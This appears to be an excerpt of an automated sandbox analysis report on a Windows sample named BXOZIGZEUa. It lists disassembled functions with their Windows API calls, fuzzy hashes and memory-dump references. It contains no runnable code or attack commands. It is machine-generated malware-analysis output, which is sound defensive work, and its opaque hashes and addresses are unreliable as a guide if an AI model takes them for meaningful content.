                                                              • Opcode Fuzzy Hash: 8debc0d10902745988ad6fa00da3df8896c47a7a6caa6427cb03906d43589fa9
                                                              • Instruction Fuzzy Hash: 411160B2904A44ABC720DF599C06E1FFBEDEB81710F144A2BE419D3740E675E9048A52
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004FF3D4
                                                              • GetWindowRect.USER32(?,?), ref: 004FF415
                                                              • CreateRoundRectRgn.GDI32(00000000,00000000,?,?,00000004,00000004), ref: 004FF43F
                                                              • SetWindowRgn.USER32(?,?,00000000), ref: 004FF455
                                                                • Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99
                                                              • SetWindowRgn.USER32(?,00000000,00000000), ref: 004FF471
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$CreateH_prolog3_H_prolog3_catch_Round
                                                              • String ID:
                                                              • API String ID: 4273792742-0
                                                              • Opcode ID: f2a97eef91e2b0462fd5756a14de7a530762f5976a36008b0a140af2ba9cea90
                                                              • Instruction ID: cdc8db34fe1126306c5fc7eeeac80d9c3adfdf15994b076b6b8c42512d09a644
                                                              • Opcode Fuzzy Hash: f2a97eef91e2b0462fd5756a14de7a530762f5976a36008b0a140af2ba9cea90
                                                              • Instruction Fuzzy Hash: 5811ED71900609DFDB10DFA5C8499BFFBB4FF98701F14012EE692A2260DB795905DF68
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?), ref: 004E0DCB
                                                              • _memset.LIBCMT ref: 004E0DE9
                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 004E0E03
                                                              • lstrcmpW.KERNEL32(?,?,?,?), ref: 004E0E15
                                                              • SetWindowTextW.USER32(00000000,?), ref: 004E0E21
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                              • String ID:
                                                              • API String ID: 4273134663-0
                                                              • Opcode ID: b68eb164353971630d206f41b6840a49820e596d025704e8c8bbafbe5084dca0
                                                              • Instruction ID: e56d74e8846a42c4e798a2c20ccbc90f24fedfdec1c80c38f2273cac557f865f
                                                              • Opcode Fuzzy Hash: b68eb164353971630d206f41b6840a49820e596d025704e8c8bbafbe5084dca0
                                                              • Instruction Fuzzy Hash: 1E01C8B6501219A7CB10AFB59C88EAF77ACEB48751F004467F915D3201EA78DD84CBA4
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0055C16F
                                                              • EnterCriticalSection.KERNEL32(00646EB4,00000000,004FC29A,00000001), ref: 0055C1CB
                                                              • __beginthread.LIBCMT ref: 0055C1E5
                                                              • SetThreadPriority.KERNEL32(00000000,000000FF), ref: 0055C1FE
                                                              • LeaveCriticalSection.KERNEL32(00646EB4), ref: 0055C215
                                                                • Part of subcall function 004E800E: __EH_prolog3.LIBCMT ref: 004E8015
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CriticalH_prolog3Section$EnterLeavePriorityThread__beginthread
                                                              • String ID:
                                                              • API String ID: 4118814795-0
                                                              • Opcode ID: 8c02e229eede84fbc1dfaacb4fc1cd31f32b85a5fa7aa60ac413ff1e946da9e1
                                                              • Instruction ID: 40a1e25718ca5fedc8e64d68a3bad04f74feb2ef0112751c5ebf7df445708ab4
                                                              • Opcode Fuzzy Hash: 8c02e229eede84fbc1dfaacb4fc1cd31f32b85a5fa7aa60ac413ff1e946da9e1
                                                              • Instruction Fuzzy Hash: 2C11C8788047119FCF249FB4DC5941A3EA1BB02B36F20171BF866862E1C634488ADB92
                                                              APIs
                                                              • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00516C1D
                                                              • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00516C35
                                                              • GetCapture.USER32 ref: 00516C37
                                                              • ReleaseCapture.USER32 ref: 00516C42
                                                              • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00516C70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Message$CapturePost$PeekRelease
                                                              • String ID:
                                                              • API String ID: 1125932295-0
                                                              • Opcode ID: 0a562c67a7719c026d6c3c7217b29a57c42d7a920062ef860f8276d44747a926
                                                              • Instruction ID: e2614c83f4c367fc921566c74f82c7d22ba598c51a7913ce7df03d33cb393b86
                                                              • Opcode Fuzzy Hash: 0a562c67a7719c026d6c3c7217b29a57c42d7a920062ef860f8276d44747a926
                                                              • Instruction Fuzzy Hash: 6301A271201200BBEB256B35DC4AF7B7AB8FB94B18F10452EF486D2190EE74EC44DB64
                                                              APIs
                                                              • ScreenToClient.USER32(?,?), ref: 0052C59E
                                                              • SendMessageW.USER32(?,00000366,00000000,?), ref: 0052C5BA
                                                              • ClientToScreen.USER32(?,?), ref: 0052C5C7
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0052C5D0
                                                              • GetParent.USER32(?), ref: 0052C5DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientScreen$LongMessageParentSendWindow
                                                              • String ID:
                                                              • API String ID: 4240056119-0
                                                              • Opcode ID: 23ed6460752bd652831b08ac5271198ee3d1e1cfac25f3858e3d168774a7e932
                                                              • Instruction ID: a9da584d87dd624b11408c5e977257a44be6bd4454912a3199d33547346e1531
                                                              • Opcode Fuzzy Hash: 23ed6460752bd652831b08ac5271198ee3d1e1cfac25f3858e3d168774a7e932
                                                              • Instruction Fuzzy Hash: 38F06D36201524A7E7211B19AC04BBF3B5CEF96761F244211FD25D6180DE75EA05D6A4
                                                              APIs
                                                              • GetCursorPos.USER32(00000000), ref: 0051F571
                                                              • ScreenToClient.USER32(?,00000000), ref: 0051F57E
                                                              • PtInRect.USER32(?,00000000,00000000), ref: 0051F591
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0051F5B0
                                                              • SetCursor.USER32(00000000), ref: 0051F5BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Cursor$ClientLoadRectScreen
                                                              • String ID:
                                                              • API String ID: 2747913190-0
                                                              • Opcode ID: bb9b96b915d215421bd0ffbea5132eb397afd2a8f31cef95293dfb002d860a1c
                                                              • Instruction ID: 9e219706a72f9d62c04dc7d3e0b07dfe8c8b69a11c5abe97a7ffadb16411117c
                                                              • Opcode Fuzzy Hash: bb9b96b915d215421bd0ffbea5132eb397afd2a8f31cef95293dfb002d860a1c
                                                              • Instruction Fuzzy Hash: 39014C72500249BBDB106FA1DC08FBE7FBAFB19349F004425B516D2160DB75DA44EB10
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00507619
                                                              • _memset.LIBCMT ref: 00507633
                                                              • GetKeyboardLayout.USER32(?), ref: 00507643
                                                              • MapVirtualKeyW.USER32(?,00000000), ref: 00507661
                                                              • ToUnicodeEx.USER32(?,00000000), ref: 0050766B
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Keyboard$Exception@8H_prolog3LayoutStateThrowUnicodeVirtual_memset
                                                              • String ID:
                                                              • API String ID: 4204171240-0
                                                              • Opcode ID: 195290af552627ac6561bb2bbff21d5f480b6b096cd115abc120aa24a9d1839d
                                                              • Instruction ID: d5561babc112b38eec77da08c34a3f857af85d1fcb8118562f833f62c782b6ce
                                                              • Opcode Fuzzy Hash: 195290af552627ac6561bb2bbff21d5f480b6b096cd115abc120aa24a9d1839d
                                                              • Instruction Fuzzy Hash: 53016771600109BFDB10ABA4DC46FEE7BBCEF14700F4040AAB646DA091DF749A84DF55
                                                              APIs
                                                                • Part of subcall function 004D7F90: std::_Lockit::_Lockit.LIBCPMT ref: 004D7FA4
                                                                • Part of subcall function 004D6960: std::_Lockit::_Lockit.LIBCPMT ref: 004D698C
                                                                • Part of subcall function 004D6960: std::_Lockit::_Lockit.LIBCPMT ref: 004D69AF
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D53D9
                                                              • _localeconv.LIBCMT ref: 004D544F
                                                              • _strcspn.LIBCMT ref: 004D556A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                                              • String ID: e
                                                              • API String ID: 331173946-4024072794
                                                              • Opcode ID: a323b4ea05bf8036dd7aac2c1dd5a61b4a9ea21d9d5bdf10182d9f992aebdfb5
                                                              • Instruction ID: 9fc0add083f3900c3fca1e92f9eb75cf1c5d2b62f0cf85952ea0bb4799797e1e
                                                              • Opcode Fuzzy Hash: a323b4ea05bf8036dd7aac2c1dd5a61b4a9ea21d9d5bdf10182d9f992aebdfb5
                                                              • Instruction Fuzzy Hash: 01124A75E006489FCB14CFA8C894ADEBBB5FF88304F15825AE809AB355DB34AD05CF94
                                                              APIs
                                                              • OffsetRect.USER32(-00000018,00000000,00000000), ref: 0057737F
                                                              • __EH_prolog3.LIBCMT ref: 005773A2
                                                              • GetSystemMetrics.USER32(00000002), ref: 0057740F
                                                                • Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$MetricsOffsetRectSystem
                                                              • String ID: NV
                                                              • API String ID: 1613555380-2996624706
                                                              • Opcode ID: 4c616387ef0aab4257b3f1e2db194d4ae901251c7a6361a7699a110deecc8f20
                                                              • Instruction ID: f6acd930e5920160881b293bbc55c931c36a846a9cc176ea262a2221fbe0871d
                                                              • Opcode Fuzzy Hash: 4c616387ef0aab4257b3f1e2db194d4ae901251c7a6361a7699a110deecc8f20
                                                              • Instruction Fuzzy Hash: FBA16331A00709DFCB10DFA9E889AAEBBF1FF48314F14856EE41AA7251DB34A940DF54
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00528322
                                                              • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0052834F
                                                              • GetWindow.USER32(?,00000005), ref: 005283B9
                                                                • Part of subcall function 005285BF: BringWindowToTop.USER32(?), ref: 00528651
                                                                • Part of subcall function 005285BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00528690
                                                                • Part of subcall function 005285BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 005286A0
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Redraw$BringH_prolog3MessageSendShow
                                                              • String ID: 83`
                                                              • API String ID: 603925361-1826646354
                                                              • Opcode ID: ad5d8c0b7482a0bdfc41ec6ddb29e049ae5031cdc441be3b44b56e721b799504
                                                              • Instruction ID: 659f8aa6dcba8a1acf5bd6d4db899096d189aa078e291d2eaa58480dbb69e894
                                                              • Opcode Fuzzy Hash: ad5d8c0b7482a0bdfc41ec6ddb29e049ae5031cdc441be3b44b56e721b799504
                                                              • Instruction Fuzzy Hash: 7D719F30A02225AFCF15AFA1D889ABD7BA5BF45B10F14446EF805AB2D5DF749D40CB90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: $$%$+
                                                              • API String ID: 233258989-3202472541
                                                              • Opcode ID: dbd390789499f58ec12fe299c8e6feecc41eec6cabe4eeac22d7816522e4f444
                                                              • Instruction ID: 8f5d1f2715dabb0d05fa042b25a4a7500c8b15431f4e168a70fee7a8f248f726
                                                              • Opcode Fuzzy Hash: dbd390789499f58ec12fe299c8e6feecc41eec6cabe4eeac22d7816522e4f444
                                                              • Instruction Fuzzy Hash: 32519872A093005BCB159E48C9A479B7BE4EBD1700F21594FF98193392E67DDC458BCA
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: $$%$+
                                                              • API String ID: 233258989-3202472541
                                                              • Opcode ID: c60e4292596159083e9f6149d92f0709a0db251b4e942dcecb07e86def6193bd
                                                              • Instruction ID: 29a07f0226802439593f3ea460f47ea8a6a1956edeafc86ae02e7460129c344e
                                                              • Opcode Fuzzy Hash: c60e4292596159083e9f6149d92f0709a0db251b4e942dcecb07e86def6193bd
                                                              • Instruction Fuzzy Hash: 54516A72A043006BDB259E48C9A479B7BE6BBC5700F245A4FE98193392D73D8C458BDB
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050F6C2
                                                              • GetWindowRect.USER32(?,?), ref: 0050F75F
                                                              • IsRectEmpty.USER32(?), ref: 0050F769
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$EmptyException@8H_prolog3Throw
                                                              • String ID: X`
                                                              • API String ID: 2711673171-2458266361
                                                              • Opcode ID: 822fd1b00f47cd690e4ffd086d2d8bf84076924834775601690a314a920cc838
                                                              • Instruction ID: a5cfa1d9e0933921a0b62cdfc9281ef0e765dde3caeeb33543b32054a40e8b18
                                                              • Opcode Fuzzy Hash: 822fd1b00f47cd690e4ffd086d2d8bf84076924834775601690a314a920cc838
                                                              • Instruction Fuzzy Hash: F4610570A00209DFCB25CFA9C588AEEBBF5FF48700F148469D415E7690DB34AD40CB65
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Window$Union
                                                              • String ID: 83`
                                                              • API String ID: 4061794321-1826646354
                                                              • Opcode ID: ea774b4039d93d8ee5fe0f984226d506f474f775c2d665ff8d34ae53e16da2af
                                                              • Instruction ID: 7229645ee353582de374b73ecabf1de18417b97d879d8f3b1dd4a37414979618
                                                              • Opcode Fuzzy Hash: ea774b4039d93d8ee5fe0f984226d506f474f775c2d665ff8d34ae53e16da2af
                                                              • Instruction Fuzzy Hash: 56414775900209AFCB15EFA9D9858EEFBF9FF89300F14441EE116A7291DB31AA45CB20
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050A564
                                                              • OffsetRect.USER32(?,?,?), ref: 0050A5A0
                                                              • FillRect.USER32(?,?), ref: 0050A5DE
                                                                • Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
